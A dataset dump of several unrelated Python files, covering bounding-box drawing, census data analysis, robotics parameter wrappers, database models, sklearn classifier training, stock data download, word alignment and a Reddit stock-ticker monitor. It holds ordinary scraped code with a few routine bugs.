def coco2voc(bboxes, height=720, width=1280):
"""
coco => [xmin, ymin, w, h]
voc => [xmin, ymin, xmax, ymax]
"""
# bboxes = bboxes.copy().astype(float) # otherwise all value will be 0 as voc_pascal dtype is np.int
# converstion (w, h) => (w, h)
bboxes[..., 2:4] += bboxes[..., 0:2]
return bboxes
@jit(nopython=True)
def bbox_iou(b1, b2):
"""Calculate the Intersection of Unions (IoUs) between bounding boxes.
Args:
b1 (np.ndarray): An ndarray containing N(x4) bounding boxes of shape (N, 4) in [xmin, ymin, xmax, ymax] format.
b2 (np.ndarray): An ndarray containing M(x4) bounding boxes of shape (N, 4) in [xmin, ymin, xmax, ymax] format.
Returns:
np.ndarray: An ndarray containing the IoUs of shape (N, 1)
"""
# 0 = np.convert_to_tensor(0.0, b1.dtype)
# b1 = b1.astype(np.float32)
# b2 = b2.astype(np.float32)
b1_xmin, b1_ymin, b1_xmax, b1_ymax = np.split(b1, 4, axis=-1)
b2_xmin, b2_ymin, b2_xmax, b2_ymax = np.split(b2, 4, axis=-1)
b1_height = np.maximum(0, b1_ymax - b1_ymin)
b1_width = np.maximum(0, b1_xmax - b1_xmin)
b2_height = np.maximum(0, b2_ymax - b2_ymin)
b2_width = np.maximum(0, b2_xmax - b2_xmin)
b1_area = b1_height * b1_width
b2_area = b2_height * b2_width
intersect_xmin = np.maximum(b1_xmin, b2_xmin)
intersect_ymin = np.maximum(b1_ymin, b2_ymin)
intersect_xmax = np.minimum(b1_xmax, b2_xmax)
intersect_ymax = np.minimum(b1_ymax, b2_ymax)
intersect_height = np.maximum(0, intersect_ymax - intersect_ymin)
intersect_width = np.maximum(0, intersect_xmax - intersect_xmin)
intersect_area = intersect_height * intersect_width
union_area = b1_area + b2_area - intersect_area
iou = np.nan_to_num(intersect_area/union_area).squeeze()
return iou
@jit(nopython=True)
def clip_bbox(bboxes_voc, height=720, width=1280):
"""Clip bounding boxes to image boundaries.
Args:
bboxes_voc (np.ndarray): bboxes in [xmin, ymin, xmax, ymax] format.
height (int, optional): height of bbox. Defaults to 720.
width (int, optional): width of bbox. Defaults to 1280.
Returns:
np.ndarray : clipped bboxes in [xmin, ymin, xmax, ymax] format.
"""
bboxes_voc[..., 0::2] = bboxes_voc[..., 0::2].clip(0, width)
bboxes_voc[..., 1::2] = bboxes_voc[..., 1::2].clip(0, height)
return bboxes_voc
def str2annot(data):
"""Generate annotation from string.
Args:
data (str): string of annotation.
Returns:
np.ndarray: annotation in array format.
"""
data = data.replace('\n', ' ')
data = data.strip().split(' ')
data = np.array(data)
annot = data.astype(float).reshape(-1, 5)
return annot
def annot2str(data):
"""Generate string from annotation.
Args:
data (np.ndarray): annotation in array format.
Returns:
str: annotation in string format.
"""
data = data.astype(str)
string = '\n'.join([' '.join(annot) for annot in data])
return string
def load_image(image_path):
return cv2.imread(image_path)[..., ::-1]
def plot_one_box(x, img, color=None, label=None, line_thickness=None):
# Plots one bounding box on image img
tl = line_thickness or round(0.002 * (img.shape[0] + img.shape[1]) / 2) + 1 # line/font thickness
color = color or [random.randint(0, 255) for _ in range(3)]
c1, c2 = (int(x[0]), int(x[1])), (int(x[2]), int(x[3]))
cv2.rectangle(img, c1, c2, color, thickness=tl, lineType=cv2.LINE_AA)
if label:
tf = max(tl - 1, 1) # font thickness
t_size = cv2.getTextSize(label, 0, fontScale=tl / 3, thickness=tf)[0]
c2 = c1[0] + t_size[0], c1[1] - t_size[1] - 3
cv2.rectangle(img, c1, c2, color, -1, cv2.LINE_AA) # filled
cv2.putText(img, label, (c1[0], c1[1] - 2), 0, tl / 3, [225, 255, 255], thickness=tf, lineType=cv2.LINE_AA)
def draw_bboxes(img, bboxes, classes, class_ids, colors = None, show_classes = None, bbox_format = 'yolo', class_name = False, line_thickness = 2):
image = img.copy()
show_classes = classes if show_classes is None else show_classes
colors = (0, 255 ,0) if colors is None else colors
if bbox_format == 'yolo':
for idx in range(len(bboxes)):
bbox = bboxes[idx]
cls = classes[idx]
cls_id = class_ids[idx]
color = colors[cls_id] if type(colors) is list else colors
if cls in show_classes:
x1 = round(float(bbox[0])*image.shape[1])
y1 = round(float(bbox[1])*image.shape[0])
w = round(float(bbox[2])*image.shape[1]/2) #w/2
h = round(float(bbox[3])*image.shape[0]/2)
voc_bbox = (x1-w, y1-h, x1+w, y1+h)
plot_one_box(voc_bbox,
image,
color = color,
label = cls if class_name else str(get_label(cls)),
line_thickness = line_thickness)
elif bbox_format == 'coco':
for idx in range(len(bboxes)):
bbox = bboxes[idx]
cls = classes[idx]
cls_id = class_ids[idx]
color = colors[cls_id] if type(colors) is list else colors
if cls in show_classes:
x1 = int(round(bbox[0]))
y1 = int(round(bbox[1]))
w = int(round(bbox[2]))
h = int(round(bbox[3]))
voc_bbox = (x1, y1, x1+w, y1+h)
plot_one_box(voc_bbox,
image,
color = color,
label = cls if class_name else str(cls_id),
line_thickness = line_thickness)
elif bbox_format == 'voc':
for idx in range(len(bboxes)):
bbox = bboxes[idx]
cls = classes[idx]
cls_id = class_ids[idx]
color = colors[cls_id] if type(colors) is list else colors
if cls in show_classes:
x1 = int(round(bbox[0]))
y1 = int(round(bbox[1]))
x2 = int(round(bbox[2]))
y2 = int(round(bbox[3]))
voc_bbox = (x1, y1, x2, y2)
plot_one_box(voc_bbox,
image,
color = color,
label = cls if class_name else str(cls_id),
line_thickness = line_thickness)
else:
raise ValueError('wrong bbox format')
return image
| StarcoderdataPython |
1706066 | #Built-in imports
import sys
# External imports
import pandas as pd
def calculate_demographic_data(print_data=True):
def round_one(x):
return float(round(x,1))
# Read data from file
df = pd.read_csv("adult.data.csv")
# How many of each race are represented in this dataset? This should be a Pandas series with race names as the index labels.
race_count = df.groupby("race").race.count().sort_values(ascending=False)
# What is the average age of men?
average_age_men = round_one(df.age[df.sex == "Male"].mean())
# What is the percentage of people who have a Bachelor's degree?
percentage_bachelors = round_one(df.education[df.education == "Bachelors"].count()*100/df.education.count())
# What percentage of people with advanced education (`Bachelors`, `Masters`, or `Doctorate`) make more than 50K?
# What percentage of people without advanced education make more than 50K?
# with and without `Bachelors`, `Masters`, or `Doctorate`
hi_edu = df.salary[(df["education-num"] >= 13) & (df["education-num"] != 15)]
lo_edu = df.salary[(df["education-num"] < 13) | (df["education-num"] == 15)]
# percentage with salary >50K
higher_education_rich = round_one(hi_edu[hi_edu == ">50K"].count()*100/hi_edu.count())
lower_education_rich = round_one(lo_edu[lo_edu == ">50K"].count()*100/lo_edu.count())
# What is the minimum number of hours a person works per week (hours-per-week feature)?
min_work_hours = df["hours-per-week"].min()
# What percentage of the people who work the minimum number of hours per week have a salary of >50K?
peo_h_min = df.salary[df["hours-per-week"] == min_work_hours]
rich_percentage = round_one(peo_h_min[peo_h_min == ">50K"].count()*100/peo_h_min.count())
# What country has the highest percentage of people that earn >50K?
country_hi_per = df[df.salary == ">50K"].groupby("native-country").salary.count()/df.groupby("native-country").salary.count()
highest_earning_country = country_hi_per[country_hi_per == country_hi_per.max()].index[0]
highest_earning_country_percentage = round_one(country_hi_per[highest_earning_country]*100)
# Identify the most popular occupation for those who earn >50K in India.
occu_max_num = df[(df["native-country"] == "India") & (df.salary == ">50K")].groupby("occupation").occupation.count()
top_IN_occupation = occu_max_num[occu_max_num == occu_max_num.max()].index[0]
# DO NOT MODIFY BELOW THIS LINE
if print_data:
print("Number of each race:\n", race_count)
print("Average age of men:", average_age_men)
print(f"Percentage with Bachelors degrees: {percentage_bachelors}%")
print(f"Percentage with higher education that earn >50K: {higher_education_rich}%")
print(f"Percentage without higher education that earn >50K: {lower_education_rich}%")
print(f"Min work time: {min_work_hours} hours/week")
print(f"Percentage of rich among those who work fewest hours: {rich_percentage}%")
print("Country with highest percentage of rich:", highest_earning_country)
print(f"Highest percentage of rich people in country: {highest_earning_country_percentage}%")
print("Top occupations in India:", top_IN_occupation)
return {
'race_count': race_count,
'average_age_men': average_age_men,
'percentage_bachelors': percentage_bachelors,
'higher_education_rich': higher_education_rich,
'lower_education_rich': lower_education_rich,
'min_work_hours': min_work_hours,
'rich_percentage': rich_percentage,
'highest_earning_country': highest_earning_country,
'highest_earning_country_percentage':
highest_earning_country_percentage,
'top_IN_occupation': top_IN_occupation
}
def main():
calculate_demographic_data()
if __name__ == "__main__":
sys.exit(main()) | StarcoderdataPython |
133304 | #!/usr/bin/env python3
# ****************************************************************************
# Copyright 2019 The Apollo Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ****************************************************************************
# -*- coding: utf-8 -*-
"""Module for init environment."""
import sys
import os
import importlib
# init vars
CYBER_PATH = os.environ['CYBER_PATH']
CYBER_DIR = os.path.split(CYBER_PATH)[0]
sys.path.append(CYBER_PATH + "/third_party/")
sys.path.append(CYBER_PATH + "/lib/")
sys.path.append(CYBER_PATH + "/python/cyber")
sys.path.append(CYBER_PATH + "/python/cyber_py")
sys.path.append(CYBER_PATH + "/lib/python/")
sys.path.append(CYBER_DIR + "/python/")
sys.path.append(CYBER_DIR + "/cyber/")
_CYBER_PARAM = importlib.import_module('_cyber_parameter_py3')
class Parameter(object):
"""
Class for Parameter wrapper.
"""
def __init__(self, name, value=None):
if (name is not None and value is None):
self.param = name
elif (name is None and value is None):
self.param = _CYBER_PARAM.new_PyParameter_noparam()
elif isinstance(value, int):
self.param = _CYBER_PARAM.new_PyParameter_int(name, value)
elif isinstance(value, float):
self.param = _CYBER_PARAM.new_PyParameter_double(name, value)
elif isinstance(value, str):
self.param = _CYBER_PARAM.new_PyParameter_string(name, value)
else:
print("type is not supported: ", type(value))
def __del__(self):
_CYBER_PARAM.delete_PyParameter(self.param)
def type_name(self):
"""
return Parameter typename
"""
return _CYBER_PARAM.PyParameter_type_name(self.param)
def descriptor(self):
"""
return Parameter descriptor
"""
return _CYBER_PARAM.PyParameter_descriptor(self.param)
def name(self):
"""
return Parameter name
"""
return _CYBER_PARAM.PyParameter_name(self.param)
def debug_string(self):
"""
return Parameter debug string
"""
return _CYBER_PARAM.PyParameter_debug_string(self.param)
def as_string(self):
"""
return native value
"""
return _CYBER_PARAM.PyParameter_as_string(self.param)
def as_double(self):
"""
return native value
"""
return _CYBER_PARAM.PyParameter_as_double(self.param)
def as_int64(self):
"""
return native value
"""
return _CYBER_PARAM.PyParameter_as_int64(self.param)
class ParameterClient(object):
"""
Class for ParameterClient wrapper.
"""
##
# @brief constructor the ParameterClient by a node and the parameter server node name.
#
# @param node a node to create client.
# @param server_node_name the parameter server's node name.
def __init__(self, node, server_node_name):
self.param_clt = _CYBER_PARAM.new_PyParameterClient(
node.node, server_node_name)
def __del__(self):
_CYBER_PARAM.delete_PyParameterClient(self.param_clt)
def set_parameter(self, param):
"""
set parameter, param is Parameter.
"""
return _CYBER_PARAM.PyParameter_clt_set_parameter(self.param_clt, param.param)
def get_parameter(self, param_name):
"""
get Parameter by param name param_name.
"""
return Parameter(_CYBER_PARAM.PyParameter_clt_get_parameter(self.param_clt, param_name))
def get_paramslist(self):
"""
get all params of the server_node_name parameterserver.
"""
pycapsulelist = _CYBER_PARAM.PyParameter_clt_get_parameter_list(
self.param_clt)
param_list = []
for capsuleobj in pycapsulelist:
param_list.append(Parameter(capsuleobj))
return param_list
class ParameterServer(object):
"""
Class for ParameterServer wrapper.
"""
##
# @brief constructor the ParameterServer by the node object.
#
# @param node the node to support the parameter server.
def __init__(self, node):
self.param_srv = _CYBER_PARAM.new_PyParameterServer(node.node)
def __del__(self):
_CYBER_PARAM.delete_PyParameterServer(self.param_srv)
def set_parameter(self, param):
"""
set parameter, param is Parameter.
"""
return _CYBER_PARAM.PyParameter_srv_set_parameter(self.param_srv, param.param)
def get_parameter(self, param_name):
"""
get Parameter by param name param_name.
"""
return Parameter(_CYBER_PARAM.PyParameter_srv_get_parameter(self.param_srv, param_name))
def get_paramslist(self):
"""
get all params of this parameterserver.
"""
pycapsulelist = _CYBER_PARAM.PyParameter_srv_get_parameter_list(
self.param_srv)
param_list = []
for capsuleobj in pycapsulelist:
param_list.append(Parameter(capsuleobj))
return param_list
| StarcoderdataPython |
1696499 | # -*- coding: utf-8 -*-
"""User models."""
import datetime as dt
from palette.database import Column, Model, SurrogatePK, db, reference_col, relationship
class Item(SurrogatePK, Model):
"""An item to be created by a user."""
__tablename__ = 'items'
name = Column(db.String(80), nullable=False)
description = Column(db.String(255)) #
terms = Column(db.String(255))
price = Column(db.String(80))
is_active = Column(db.Boolean(), default=True)
created_at = Column(db.DateTime, default=dt.datetime.utcnow)
user_id = reference_col('users') # , nullable=True)
user = relationship('User', backref='items')
def __init__(self, name, **kwargs):
"""Create instance."""
db.Model.__init__(self, name=name, **kwargs)
def __repr__(self):
"""Represent instance as a unique string."""
# return '<Item({name})>'.format(name=self.name)
return str(id)
class Images(SurrogatePK, Model):
"""An image to be added to an item."""
__tablename__ = 'images'
image = Column(db.String(80), nullable=False)
caption = Column(db.String(80))
is_primary = Column(db.Boolean(), default=False)
item_id = reference_col('items') # , nullable=True)
item = relationship('Item', backref='images')
def __init__(self, name, **kwargs):
"""Create instance."""
db.Model.__init__(self, image=image, **kwargs)
def __repr__(self):
"""Represent instance as a unique string."""
return '<Image({caption})>'.format(caption=self.caption)
class Reviews(SurrogatePK, Model):
"""A review to be added to an item."""
__tablename__ = 'reviews'
stars = Column(db.Integer(), nullable=False)
comment = Column(db.String(255))
is_active = Column(db.Boolean(), default=True)
created_at = Column(db.DateTime, default=dt.datetime.utcnow) # server_default=text('now()'
item_id = reference_col('items') # , nullable=True)
item = relationship('Item', backref='reviews')
user_id = reference_col('users') # , nullable=True) for anon reviews
user = relationship('User', backref='reviews')
def __init__(self, name, **kwargs):
"""Create instance."""
db.Model.__init__(self, stars=stars, **kwargs)
def __repr__(self):
"""Represent instance as a unique string."""
return '<Image({stars})>'.format(stars=self.stars)
| StarcoderdataPython |
121184 | <gh_stars>0
import pickle
import os
import numpy as np
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.metrics import f1_score
from sklearn.metrics import precision_score
from sklearn.metrics import recall_score
from sklearn.metrics import balanced_accuracy_score
from sklearn.metrics import plot_confusion_matrix
from sklearn.linear_model import LogisticRegression
from sklearn.linear_model import RidgeClassifier
from sklearn.naive_bayes import MultinomialNB
from sklearn.neighbors import KNeighborsClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.svm import LinearSVC
from sklearn.neural_network import MLPClassifier
class Classification:
def __init__(self):
print("Training Initialized for Continuous Variable:")
def train(self, data, var, info):
print(var)
train_metrics = dict()
method_list = info[0]
default_active = info[1]
params = info[2]
if not os.path.exists(var):
os.makedirs(var)
try:
for count, method in enumerate(method_list):
cls = getattr(self, "train_" + method)(default_active[count], params[count])
train_metrics[method] = self.train_data(data, var, method, cls)
return train_metrics
except AttributeError:
print("The continuous training method '" + method + "' does not exist, kindly check the config files!")
@staticmethod
def train_data(self, data, var, method, cls):
try:
print("Training " + var + " with " + method + " classification method.")
y = np.array(data[var])
x = np.array(data.drop(columns=[var]))
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.33, random_state=42)
cls.fit(x_train, y_train)
y_pred = cls.predict(x_test)
pkl_filename = method + ".pkl"
with open(var + "/" + pkl_filename, 'wb') as file:
pickle.dump(cls, file)
plot_confusion_matrix(cls, x_test, y_test)
plt.title(var + ": Confusion Matrix by " + method + " classification")
plt.ylabel('Actual Classes')
plt.xlabel('Predicted Classes')
plt.savefig(var + "/" + method + "_cm.jpg")
metric_dict = {
"accuracy": balanced_accuracy_score(y_test, y_pred),
"precision": precision_score(y_test, y_pred, average='weighted'),
"recall": recall_score(y_test, y_pred, average='weighted'),
"f1_score": f1_score(y_test, y_pred, average='weighted')
}
print("Training of " + var + " with " + method + " classification method complete!")
return metric_dict
except:
print("Training of " + var + " with " + method + " classification method incomplete!")
return {
"accuracy": 0,
"precision": 0,
"recall": 0,
"f1_score": 0
}
@staticmethod
def train_logistic_reg(self, default, param):
if default:
cls_trainer = LogisticRegression(random_state=0)
else:
cls_trainer = LogisticRegression(
penalty=param["penalty"], dual=param["dual"], tol=param["tol"],
C=param["C"], fit_intercept=param["fit_intercept"],
intercept_scaling=param["intercept_scaling"], class_weight=param["class_weight"],
random_state=param["random_state"], solver=param["solver"],
max_iter=param["max_iter"], multi_class=param["multi_class"],
verbose=param["verbose"], warm_start=param["warm_start"],
n_jobs=param["n_jobs"], l1_ratio=param["l1_ratio"])
return cls_trainer
@staticmethod
def train_ridge(self, default, param):
if default:
cls_trainer = RidgeClassifier(random_state=0)
else:
cls_trainer = RidgeClassifier(
alpha=param["alpha"], fit_intercept=param["fit_intercept"],
normalize=param["normalize"], max_iter=param["max_iter"],
tol=param["tol"], class_weight=param["class_weight"],
random_state=param["random_state"], solver=param["solver"])
return cls_trainer
@staticmethod
def train_naive_bayes(self, default, param):
if default:
cls_trainer = MultinomialNB()
else:
cls_trainer = MultinomialNB(alpha=param["alpha"], fit_prior=param["fit_prior"],
class_prior=param["class_prior"])
return cls_trainer
@staticmethod
def train_KNN(self, default, param):
if default:
cls_trainer = KNeighborsClassifier()
else:
cls_trainer = KNeighborsClassifier(
n_neighbors=param["n_neighbors"], weights=param["weights"],
algorithm=param["algorithm"], max_iter=param["max_iter"],
leaf_size=param["leaf_size"], p=param["p"], metric=param["metric"],
metric_params=param["metric_params"], n_jobs=param["n_jobs"]
)
return cls_trainer
@staticmethod
def train_random_forest(self, default, param):
if default:
cls_trainer = RandomForestClassifier(random_state=0)
else:
cls_trainer = RandomForestClassifier(
n_estimators=param["n_estimators"], criterion=param["criterion"], max_depth=param["max_depth"],
min_samples_split=param["min_samples_split"], min_samples_leaf=param["min_samples_leaf"],
min_weight_fraction_leaf=param["min_weight_fraction_leaf"], max_features=param["max_features"],
random_state=param["random_state"], max_leaf_nodes=param["max_leaf_nodes"],
min_impurity_decrease=param["min_impurity_decrease"], bootstrap=param["bootstrap"],
oob_score=param["oob_score"], n_jobs=param["n_jobs"], verbose=param["verbose"],
warm_start=param["warm_start"], class_weight=param["class_weight"], ccp_alpha=param["ccp_alpha"],
max_samples=param["max_samples"])
return cls_trainer
@staticmethod
def train_decision_tree(self, default, param):
if default:
cls_trainer = DecisionTreeClassifier(random_state=0)
else:
cls_trainer = DecisionTreeClassifier(
criterion=param["criterion"], splitter=param["splitter"], max_depth=param["max_depth"],
min_samples_split=param["min_samples_split"], min_samples_leaf=param["min_samples_leaf"],
min_weight_fraction_leaf=param["min_weight_fraction_leaf"], max_features=param["max_features"],
random_state=param["random_state"], max_leaf_nodes=param["max_leaf_nodes"],
min_impurity_decrease=param["min_impurity_decrease"], class_weight=param["class_weight"],
ccp_alpha=param["ccp_alpha"]
)
return cls_trainer
@staticmethod
def train_support_vector(self, default, param):
if default:
cls_trainer = LinearSVC(random_state=0)
else:
cls_trainer = LinearSVC(
C=param["C"], kernel=param["kernel"], degree=param["degree"], gamma=param["gamma"],
coef0=param["coef0"], shrinking=param["shrinking"], probability=param["probability"], tol=param["tol"],
cache_size=param["cache_size"], class_weight=param["class_weight"], verbose=param["verbose"],
max_iter=param["max_iter"], decision_function_shape=param["decision_function_shape"],
break_ties=param["break_ties"], random_state=param["random_state"]
)
return cls_trainer
@staticmethod
def train_neural_MLP(self, default, param):
if default:
cls_trainer = MLPClassifier(random_state=0, max_iter=300)
else:
cls_trainer = MLPClassifier(
hidden_layer_sizes=tuple(param["hidden_layer_sizes"]), activation=param["activation"],
solver=param["solver"],
alpha=param["alpha"], batch_size=param["batch_size"], learning_rate=param["learning_rate"],
learning_rate_init=param["learning_rate_init"], power_t=param["power_t"], max_iter=param["max_iter"],
shuffle=param["shuffle"], random_state=param["random_state"], tol=param["tol"],
verbose=param["verbose"], warm_start=param["warm_start"], momentum=param["momentum"],
nesterovs_momentum=param["nesterovs_momentum"], early_stopping=param["early_stopping"],
validation_fraction=param["validation_fraction"], beta_1=param["beta_1"], beta_2=param["beta_2"],
epsilon=param["epsilon"], n_iter_no_change=param["n_iter_no_change"], max_fun=param["max_fun"]
)
return cls_trainer
| StarcoderdataPython |
1667810 | <gh_stars>0
import setuptools
setuptools.setup(
version="0.0.1",
install_requires=[
'wallstreet==0.3',
'forex-python==1.5'
],
description="Wall street cli",
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires='>=3.6',
entry_points = {
'console_scripts': ['wallstreet_cli=wallstreet_cli.main:main'],
}
)
| StarcoderdataPython |
3378494 | <reponame>PySilentSubstitution/silent-sub
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Aug 3 11:00:15 2021
@author: jtm
"""
| StarcoderdataPython |
49696 | <reponame>halilkocaerkek/GitHub-amazon-sagemaker-stock-prediction-alphavantage
import pandas as pd
import matplotlib.pyplot as plt
from enum import Enum
Adjusted = Enum('Adjusted', 'true false')
Interval = Enum('Interval', '_1min _5min _15min _30min _60min')
OutputSize = Enum('outputsize', 'compact full')
DataType = Enum('datatype', 'json csv')
def Slice(year, month):
return 'year{}month{}'.format(year, month)
def GetInterval(interval):
return interval.name[1:]
key = '<KEY>'
apiUrl = 'https://www.alphavantage.co/query'
def Time_Series_Intraday_Extended(symbol,interval,slice,adjusted,key):
url = '{}?function=TIME_SERIES_INTRADAY_EXTENDED&symbol={}&interval={}&slice={}&adjusted={}&apikey={}'
fileName = 'data/download/{}-{}-{}.csv'.format(symbol,GetInterval(interval), slice)
data = pd.read_csv(url.format(apiUrl, symbol, GetInterval(interval), slice, adjusted, key))
data.to_csv(fileName)
print(fileName)
for symbol in ['IBM','AAPL']:
for year in range(1,3):
for month in range(1,13):
Time_Series_Intraday_Extended(symbol, Interval._60min, Slice(year,month), Adjusted.false, key) | StarcoderdataPython |
139357 | import simalign
from tqdm import tqdm
from simalign import SentenceAligner
def parse_file2lines(filename):
lines=[]
with open(filename) as f:
lines = f.readlines()
lines = [x.strip() for x in lines]
return lines
def align_simaligner(infile_src, infile_tgt, outfile, langs):
moden = 'itermax'
for lang in langs:
if lang in ['de', 'cs']:
moden = 'inter'
#model options: bert | xlmr |
tok_src_lines = parse_file2lines(infile_src)
tok_tgt_lines = parse_file2lines(infile_tgt)
simple_aligner = SentenceAligner(model="xlmr", token_type="bpe", matching_methods="mai")
# The output is a dictionary with different matching methods.
# Each method has a list of pairs indicating the indexes of aligned words (The alignments are zero-indexed).
alignments=[]
for src_sentence, trg_sentence in tqdm(zip(tok_src_lines, tok_tgt_lines)):
alignments.append(simple_aligner.get_word_aligns(src_sentence, trg_sentence)[moden])
writer = open(outfile, 'w')
print('Writing alignments at: '+outfile)
for alignment in alignments:
line = ''
for pair in alignment:
p = str(pair[0])+'-'+str(pair[1])
line += p+' '
writer.write(line.strip()+'\n')
writer.close() | StarcoderdataPython |
1762995 | """Entry point"""
from src.view import viewfactory as vf
def main():
"""simple game loop to link a view with our model logic"""
view = vf.factory_create()
view.init()
while 1:
view.handle_events()
view.update()
view.display()
view.quit()
if __name__ == '__main__':
main() | StarcoderdataPython |
3277028 | import os
import sys
import praw
import spacy
nlp = spacy.load('en_core_web_sm',disable=['ner','textcat'])
import nltk
from nltk.tokenize import word_tokenize
import glob
import pandas as pd
import re
from datetime import datetime
import threading
dev_mode = False
def fix_path(name):
if dev_mode == True:
return name
return sys.path[0]+'/'+name
# Get the symbols
class Tickers:
def __init__(self):
df = pd.DataFrame()
for filename in glob.glob(fix_path('datasets/symbols/*')):
_df = pd.read_csv(filename, sep='\t')
_df['source'] = re.findall(r"symbols\/([a-zA-Z]+)\.txt", filename)[0]
df = df.append(_df)
self.df = df.dropna()
tickers = Tickers()
df = tickers.df
# Symbols to match & ignore
real_symbols = df['Symbol'].unique()
false_symbol = ['ON','IN','AT','FOR','BY','DD','YOLO','CORP','ONE','SUB','MOON','CEO','OUT','INTO','MAN','POST','BRO','LIFE','CALL','DUDE','IDEA']
# Get the credentials & settings for PRAW
if dev_mode != True:
from auth import reddit_client_id, reddit_client_secret, reddit_password, reddit_useragent, reddit_username
##reddit_client_id=os.environ['reddit_client_id']
#reddit_client_secret=os.environ['reddit_client_secret']
#reddit_password=os.environ['reddit_password']
#reddit_useragent=os.environ['reddit_useragent']
#reddit_username=os.environ['reddit_username']
# Monitor Reddit
class Monitor:
def __init__(self):
print("Monitoring")
self.df = False
self.df_name = False
if os.path.exists(fix_path('datasets/datasets.pkl')):
self.datasets = pd.read_pickle(fix_path('datasets/datasets.pkl'))
else:
self.datasets = pd.DataFrame()
# PRAW setup
self.praw = praw.Reddit(
client_id=reddit_client_id,
client_secret=reddit_client_secret,
password=<PASSWORD>,
user_agent=reddit_useragent,
username=reddit_username
)
def start(self, subreddit="wallstreetbets", thread=True):
sub = self.praw.subreddit(subreddit)
if thread is True:
commentThread = threading.Thread(name='comments', target=self.monitorComments, args=(sub,subreddit))
submissionThread = threading.Thread(name='submissions', target=self.monitorSubmissions, args=(sub,subreddit))
commentThread.start()
submissionThread.start()
else:
self.monitorComments(sub,subreddit)
self.monitorSubmissions(sub,subreddit)
def monitorSubmissions(self, sub, subreddit):
for submission in sub.stream.submissions():
self.process_submission(submission, subreddit)
def monitorComments(self, sub, subreddit):
for comment in sub.stream.comments():
self.process_comment(comment, subreddit)
def process_submission(self, submission, subreddit):
NER = nlp(submission.title.lower())
NER2 = nlp(submission.selftext.lower())
found = []
has_rocket = '🚀' in submission.title.lower()
for token in NER:
if '.' in token.text:
w = token.text.upper().split('.')[0]
else:
w = token.text.upper()
if token.pos_ in ['ADP','NOUN','PROPN'] and w in real_symbols and w not in false_symbol:
found.append(w)
for token in NER2:
if '.' in token.text:
w = token.text.upper().split('.')[0]
else:
w = token.text.upper()
if token.pos_ in ['ADP','NOUN','PROPN'] and w in real_symbols and w not in false_symbol:
found.append(w)
if (len(found)>0):
#print('\n\n----------------')
#print(has_rocket, submission.title)
#print(found)
self.record(source='submission', has_rocket=has_rocket, symbols=list(set(found)), title=submission.title, subreddit=subreddit)
def process_comment(self, comment, subreddit):
NER = nlp(comment.body.lower())
found = []
has_rocket = '🚀' in comment.body.lower()
for token in NER:
if '.' in token.text:
w = token.text.upper().split('.')[0]
else:
w = token.text.upper()
if token.pos_ in ['ADP','NOUN','PROPN'] and w in real_symbols and w not in false_symbol:
found.append(w)
if (len(found)>0):
self.record(source='comment', has_rocket=has_rocket, symbols=list(set(found)), title=comment.body, subreddit=subreddit)
def get_df(self):
d = datetime.now()
dname = '{}-{}-{}_{}_{}'.format(d.year,d.month,d.day,d.hour,d.minute)
filename = fix_path("datasets/data/"+dname+".pkl")
if self.df_name != False:
filename_prev = fix_path("datasets/data/"+self.df_name+".pkl")
if self.df_name != dname:
# New timestep, move on to a new dataset
# Save to the index
self.datasets.at[datetime.timestamp(d), 'filename'] = filename.replace('/home/julien/mk2/main/','')
self.datasets.to_pickle(fix_path('datasets/datasets.pkl'))
print("#### New DF: ", filename)
# No the first run? There was a previous timestep buffer?
if self.df_name != False:
self.df.to_pickle(filename_prev)
# Create/recover a new df
if os.path.exists(filename):
# Recover existing file
self.df = False
self.df = pd.read_pickle(filename)
self.df_name = dname
else:
# Create a new DF
self.df = False
self.df = pd.DataFrame(columns=['comment', 'submission', 'rockets'])
self.df_name = dname
self.df.to_pickle(filename)
return self.df
def record(self, source, has_rocket, symbols, subreddit, title=''):
print(subreddit, source, has_rocket, symbols)
df = self.get_df()
for symbol in symbols:
if symbol in df.index:
df.at[symbol, source] = df.at[symbol, source]+1
if has_rocket:
df.at[symbol, 'rockets'] = df.at[symbol, 'rockets']+1
else:
df.at[symbol, "submission"] = 0
df.at[symbol, "comment"] = 0
df.at[symbol, source] = 1
if has_rocket:
df.at[symbol, 'rockets'] = 1
else:
df.at[symbol, 'rockets'] = 0
reddit = Monitor()
if dev_mode == True:
reddit.start(subreddit="wallstreetbets", thread=False)
else:
reddit.start(subreddit="wallstreetbets", thread=True)
reddit.start(subreddit="pennystocks", thread=True)
reddit.start(subreddit="Baystreetbets", thread=True) | StarcoderdataPython |
62533 | <gh_stars>10-100
#!/usr/bin/env python3
# Copyright 2004-present Facebook. All Rights Reserved.
import collections
import copy
from typing import Dict
def deep_update(dst: Dict, src: Dict, join_lists: bool = False) -> None:
"""Perform an in-place deep merge of ``src`` into ``dst``.
Args:
dst: The destination dictionary.
src: The source dictionary.
join_lists: Flag to join lists instead of overwriting them.
Example:
>>> src = {'foo': {'bar': 'baz'}}
>>> dst = {'foo': {'bar': 'qux', 'quux': 'quuz'}}
>>> deep_update(dst, src)
>>> dst
{'foo': {'bar': 'baz', 'quux': 'quuz'}}
>>> src = {"foo": {"bar": ["baz"]}}
>>> dst = {"foo": {"bar": ["qux"]}}
>>> deep_update(dst, src, join_lists=True)
>>> dst
{"foo": {"bar": ["qux", "baz"]}}
"""
for k, v in src.items():
if k in dst:
if isinstance(v, dict) and isinstance(dst[k], collections.abc.Mapping):
deep_update(dst[k], v, join_lists)
elif join_lists and isinstance(v, list) and isinstance(dst[k], list):
dst[k] = dst[k] + v
else:
dst[k] = copy.deepcopy(v)
else:
dst[k] = copy.deepcopy(v)
| StarcoderdataPython |
1791141 | import autogp
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
# Generate synthetic data.
N_all = 200
N = 50
inputs = 5 * np.linspace(0, 1, num=N_all)[:, np.newaxis]
outputs = np.sin(inputs)
# selects training and test
